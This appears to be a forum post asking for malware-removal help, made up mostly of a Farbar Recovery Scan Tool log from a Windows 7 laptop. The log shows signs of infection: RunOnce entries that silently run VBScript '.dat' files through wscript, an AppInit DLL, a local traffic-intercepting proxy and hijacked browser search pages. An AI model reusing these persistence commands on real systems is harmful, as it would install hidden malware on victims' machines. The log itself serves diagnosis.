I think my laptop is infected....

ok thank you...

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 24.10.2018
Ran by 1108 (administrator) on 1108-PC (31-10-2018 17:16:50)
Running from C:\Users\1108\Downloads
Loaded Profiles: 1108 (Available Profiles: 1108 & Randi)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
(Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.13.11\ccSvcHst.exe
() C:\Program Files (x86)\user extensions\Client.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe
(SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicatorCom.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicator.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil64_31_0_0_122_ActiveX.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(McAfee, Inc.) C:\Program Files\McAfee.com\Agent\mcupdate.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [590256 2011-05-17] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [296824 2010-09-25] (TOSHIBA Corporation)
HKLM\...\Run: [TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [972672 2011-04-27] (TOSHIBA Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [11775592 2011-01-26] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2188904 2011-01-18] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2679592 2011-02-03] (Synaptics Incorporated)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1544624 2011-05-24] (TOSHIBA Corporation)
HKLM\...\Run: [IntelPAN] => C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe [1935120 2011-06-01] (Intel® Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [710560 2011-06-09] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [712096 2011-07-01] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [38824 2011-06-28] (TOSHIBA Corporation)
HKLM-x32\...\Run: [SVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [532480 2010-11-09] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2011-03-10] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2010-08-16] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252792 2010-06-04] (TOSHIBA)
HKLM-x32\...\Run: [NortonOnlineBackupReminder] => C:\Program Files (x86)\Toshiba\Toshiba Online Backup\Activation\TOBuActivation.exe [3218864 2011-06-22] (Toshiba)
HKLM-x32\...\Run: [ToshibaAppPlace] => C:\Program Files (x86)\Toshiba\Toshiba App Place\ToshibaAppPlace.exe [552960 2010-09-23] (Toshiba)
HKLM-x32\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [537992 2014-04-25] (McAfee, Inc.)
HKLM-x32\...\Run: [Microsoft Default Manager] => C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM-x32\...\Run: [Intuit SyncManager] => C:\Program Files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe [1532760 2011-06-14] (Intuit Inc. All rights reserved.)
HKLM-x32\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [537992 2014-04-25] (McAfee, Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\RunOnce: [Tehepalu] => C:\windows\SysWOW64\wscript.exe /E:vbscript /B "C:\Users\1108\AppData\Local\7340FE~1\Nefos.dat"
HKLM-x32\...\RunOnce: [Cisoh] => C:\windows\SysWOW64\wscript.exe /E:vbscript /B "C:\Users\1108\AppData\Local\00EC4B~1\Geso.dat"
Winlogon\Notify\igfxcui: C:\windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\...\Run: [HP Officejet Pro 8600 (NET)] => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\...\Run: [HP Officejet Pro 8600 (NET) #2] => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\...\Run: [ComcastAntispyClient] => "C:\Program Files (x86)\comcasttb\ComcastSpywareScan\ComcastAntispy.exe" /hide
HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\...\Run: [UpdateAdmin] => C:\Users\1108\AppData\Local\UpdateAdmin\UpdateAdmin.exe /RUN
HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [8893360 2018-09-11] (SUPERAntiSpyware)
HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\...\MountPoints2: {6cbb8405-f648-11e1-b814-74e50bd36cc0} - F:\win\setup.exe -phs
AppInit_DLLs-x32: C:\PROGRA~3\{E7490~1\201~1.9\feco.dll => C:\ProgramData\{E7490F8A-B7CB-DE0C-064D-AE8ED6CF7D00}\2.0.1.9\feco.dll [1107968 2016-02-01] ()
Startup: C:\Users\1108\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Officejet Pro 8600 (Network).lnk [2018-10-31]
ShortcutTarget: Monitor Ink Alerts - HP Officejet Pro 8600 (Network).lnk -> C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk [2012-08-31]
ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
GroupPolicy: Restriction ? <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyEnable: [S-1-5-21-2869800736-2015486075-1125525389-1000] => Proxy is enabled.
ProxyServer: [S-1-5-21-2869800736-2015486075-1125525389-1000] => http=127.0.0.1:49199;https=127.0.0.1:49199
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{497F879F-FBAD-4DED-8F52-AAF67614D75A}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{BBABAC7E-65A2-4858-8A55-4A622F3AEBB2}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=elm&hsimp=yhs-001&type=hdr_s_16_21_csp_tight14_15_27&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtAtD0FyD0B0BtC0AtC0AtBtN0D0Tzu0StCyCtDyEtN1L2XzutAtFtBtCtFtCtFtDtN1L1Czu1M1Q1CtByEtFtCtFtDtN1L1G1B1V1N2Y1L1Qzu2SyC0Fzz0CtD0DtD0DtGtDtD0A0FtG0BtCtA0DtGtByDtAtBtGyDyDzyzztBtB0EyCzz0F0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0B0FzyyByDzz0AtAtGzyzztC0BtGyEtAtC0FtGzy0A0F0CtGyEtA0Dzzzy0E0A0AtCtDtB0F2QtN0A0LzuyE%26cr%3D1299520605%26a%3Dhdr_s_16_21_csp_tight14_15_27%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=elm&hsimp=yhs-001&type=hdr_s_16_21_csp_tight14_15_27&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtAtD0FyD0B0BtC0AtC0AtBtN0D0Tzu0StCyCtDyEtN1L2XzutAtFtBtCtFtCtFtDtN1L1Czu1M1Q1CtByEtFtCtFtDtN1L1G1B1V1N2Y1L1Qzu2SyC0Fzz0CtD0DtD0DtGtDtD0A0FtG0BtCtA0DtGtByDtAtBtGyDyDzyzztBtB0EyCzz0F0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0B0FzyyByDzz0AtAtGzyzztC0BtGyEtAtC0FtGzy0A0F0CtGyEtA0Dzzzy0E0A0AtCtDtB0F2QtN0A0LzuyE%26cr%3D1299520605%26a%3Dhdr_s_16_21_csp_tight14_15_27%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium
HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
HKU\S-1-5-21-2869800736-2015486075-1125525389-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://start.toshiba.com
URLSearchHook: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll (McAfee, Inc.)
URLSearchHook: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 - McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll (McAfee, Inc.)
SearchScopes: HKLM -> DefaultScope {F73C212A-31AC-4BDE-A0E7-9C02A5EC9771} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {1b31c9d2-7135-442b-bb93-7c002172adc6} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_16_21_csp_tight14_15_27&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtAtD0FyD0B0BtC0AtC0AtBtN0D0Tzu0StCyCtDyEtN1L2XzutAtFtBtCtFtCtFtDtN1L1Czu1M1Q1CtByEtFtCtFtDtN1L1G1B1V1N2Y1L1Qzu2SyC0Fzz0CtD0DtD0DtGtDtD0A0FtG0BtCtA0DtGtByDtAtBtGyDyDzyzztBtB0EyCzz0F0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0B0FzyyByDzz0AtAtGzyzztC0BtGyEtAtC0FtGzy0A0F0CtGyEtA0Dzzzy0E0A0AtCtDtB0F2QtN0A0LzuyE%26cr%3D1299520605%26a%3Dhdr_s_16_21_csp_tight14_15_27%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKLM -> {9143e921-7c9a-4d27-ac43-eaccc78cc55a} URL =
SearchScopes: HKLM -> {F73C212A-31AC-4BDE-A0E7-9C02A5EC9771} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 -> DefaultScope {F73C212A-31AC-4BDE-A0E7-9C02A5EC9771} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {8fe8d013-c3fd-4802-af48-79274e9f969e} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^YO^xdm117^YYA^us&si=245288&ptb=E187224B-4CC5-406C-9E3C-6CFBF6A83A23&psa=&ind=2013120700&st=sb&n=77fdc8bc&searchfor={searchTerms}
SearchScopes: HKLM-x32 -> {F73C212A-31AC-4BDE-A0E7-9C02A5EC9771} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_15_43_csp_tight14_15_27&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtAtD0FyD0B0BtC0AtC0AtBtN0D0Tzu0StCtAzzyBtN1L2XzutAtFtCtAtFyBtFtDtN1L1Czu1M1Q1CtCyDtN1L1G1B1V1N2Y1L1Qzu2SyByCyE0FtDzzyCzztGtBtAzytDtGtA0DyBzytGyB0CtB0DtGyDyB0DtAtAtD0DtDyEzytByC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0B0FzyyByDzz0AtAtGzyzztC0BtGyEtAtC0FtGzy0A0F0CtGyEtA0Dzzzy0E0A0AtCtDtB0F2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtCtBtC%26cr%3D351201849%26a%3Dhdr_s_15_43_csp_tight14_15_27%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_15_43_csp_tight14_15_27&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtAtD0FyD0B0BtC0AtC0AtBtN0D0Tzu0StCtAzzyBtN1L2XzutAtFtCtAtFyBtFtDtN1L1Czu1M1Q1CtCyDtN1L1G1B1V1N2Y1L1Qzu2SyByCyE0FtDzzyCzztGtBtAzytDtGtA0DyBzytGyB0CtB0DtGyDyB0DtAtAtD0DtDyEzytByC2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0B0FzyyByDzz0AtAtGzyzztC0BtGyEtAtC0FtGzy0A0F0CtGyEtA0Dzzzy0E0A0AtCtDtB0F2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtCtBtC%26cr%3D351201849%26a%3Dhdr_s_15_43_csp_tight14_15_27%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> {180780f0-b348-4b44-8210-94a8f3ee15b2} URL = hxxp://search.comcast.net/search/?cat=Web&con=toolbar&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> {1AC492AF-382C-4734-846C-10FB4D9A5483} URL = hxxp://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_tight14_15_27&cd=2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtAtD0FyD0B0BtC0AtC0AtBtN0D0Tzu0StCtBzztDtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StBzz0A0B0B0ByCyDtGyCyByE0AtGyD0EyDyEtGtD0B0F0CtGyCtA0FtDtDtB0Fzy0FyD0BtB2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0B0FzyyByDzz0AtAtGzyzztC0BtGyEtAtC0FtGzy0A0F0CtGyEtA0Dzzzy0E0A0AtCtDtB0F2QtN0A0LzuyEtN1B2Z1V1T1S1NzuzztBtB&cr=2093137412&ir=
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> {1b31c9d2-7135-442b-bb93-7c002172adc6} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=elm&hsimp=yhs-001&type=hdr_s_16_21_csp_tight14_15_27&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DHodor%26cd%3D2XzuyEtN2Y1L1Qzu0Bzzzzzz0EtAtD0FyD0B0BtC0AtC0AtBtN0D0Tzu0StCyCtDyEtN1L2XzutAtFtBtCtFtCtFtDtN1L1Czu1M1Q1CtByEtFtCtFtDtN1L1G1B1V1N2Y1L1Qzu2SyC0Fzz0CtD0DtD0DtGtDtD0A0FtG0BtCtA0DtGtByDtAtBtGyDyDzyzztBtB0EyCzz0F0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0B0FzyyByDzz0AtAtGzyzztC0BtGyEtAtC0FtGzy0A0F0CtGyEtA0Dzzzy0E0A0AtCtDtB0F2QtN0A0LzuyE%26cr%3D1299520605%26a%3Dhdr_s_16_21_csp_tight14_15_27%26os_ver%3D6.1%26os%3DWindows%2B7%2BHome%2BPremium&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> {6ADE8272-09F5-4776-8E15-40795B10D36F} URL = hxxp://search.whiteskyservices.com/?wstoken=728AA395-C99F-44CC-B323-30A69AEF5F9C&dtid=1&pid=21&src=sgsearch&v=1.14.1126.5&searchparam={SearchTerms}
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> {8fe8d013-c3fd-4802-af48-79274e9f969e} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^YO^xdm117^YYA^us&si=245288&ptb=E187224B-4CC5-406C-9E3C-6CFBF6A83A23&psa=&ind=2013120700&st=sb&n=77fdc8bc&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> {974D8811-4FF2-4142-BED7-F84EB17CF623} URL = hxxp://search.xfinity.com/?cat=web&con=toolbar&cid=xfstart_tech_search&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> {C04B7D22-5AEC-4561-8F49-27F6269208F6} URL = hxxp://www2.inbox.com/search/dispatcher.aspx?tp=bs&qkw={searchTerms}&tbid=82771&iwk=283&lng=en
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> {C2D9A93A-25D1-4A35-9325-06E52A5517B8} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
SearchScopes: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> {F73C212A-31AC-4BDE-A0E7-9C02A5EC9771} URL = hxxp://www.google.com/search?sourceid=ie9&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNP
BHO: XFINITY Toolbar -> {4b9bcce8-a70b-402a-a7e1-db96831ee26f} -> C:\Program Files (x86)\xfin_portal\comcastdx64.dll [2013-12-11] ()
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll [2011-07-12] (<TOSHIBA>)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2010-11-15] (Adobe Systems Incorporated)
BHO-x32: XFINITY Toolbar -> {4b9bcce8-a70b-402a-a7e1-db96831ee26f} -> C:\Program Files (x86)\xfin_portal\comcastdx.dll [2013-12-11] ()
BHO-x32: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll [2010-07-27] (Microsoft Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Search Assistant BHO -> {9359da42-06fb-46f2-9e4a-05c05b98a5ef} -> C:\Program Files (x86)\InboxAce_1g\bar\1.bin\1gSrcAs.dll => No File
BHO-x32: McAfee WebAdvisor BHO -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
BHO-x32: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll [2010-08-24] (Microsoft Corporation)
BHO-x32: No Name -> {D3D233D5-9F6D-436C-B6C7-E63F77503B30} -> No File
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre6\bin\jp2ssv.dll [2011-07-27] (Sun Microsystems, Inc.)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll [2011-07-12] (<TOSHIBA>)
Toolbar: HKLM - XFINITY Toolbar - {4b9bcce8-a70b-402a-a7e1-db96831ee26f} - C:\Program Files (x86)\xfin_portal\comcastdx64.dll [2013-12-11] ()
Toolbar: HKLM-x32 - @C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\MSN Toolbar\Platform\6.3.2291.0\npwinext.dll [2010-08-24] (Microsoft Corporation)
Toolbar: HKLM-x32 - XFINITY Toolbar - {4b9bcce8-a70b-402a-a7e1-db96831ee26f} - C:\Program Files (x86)\xfin_portal\comcastdx.dll [2013-12-11] ()
Toolbar: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Toolbar: HKU\S-1-5-21-2869800736-2015486075-1125525389-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2017-02-22] (McAfee, Inc.)
Handler: inbox - {37540F19-DD4C-478B-B2DF-C19281BCAF27} - C:\PROGRA~2\INBOXT~1\Inbox.dll No File
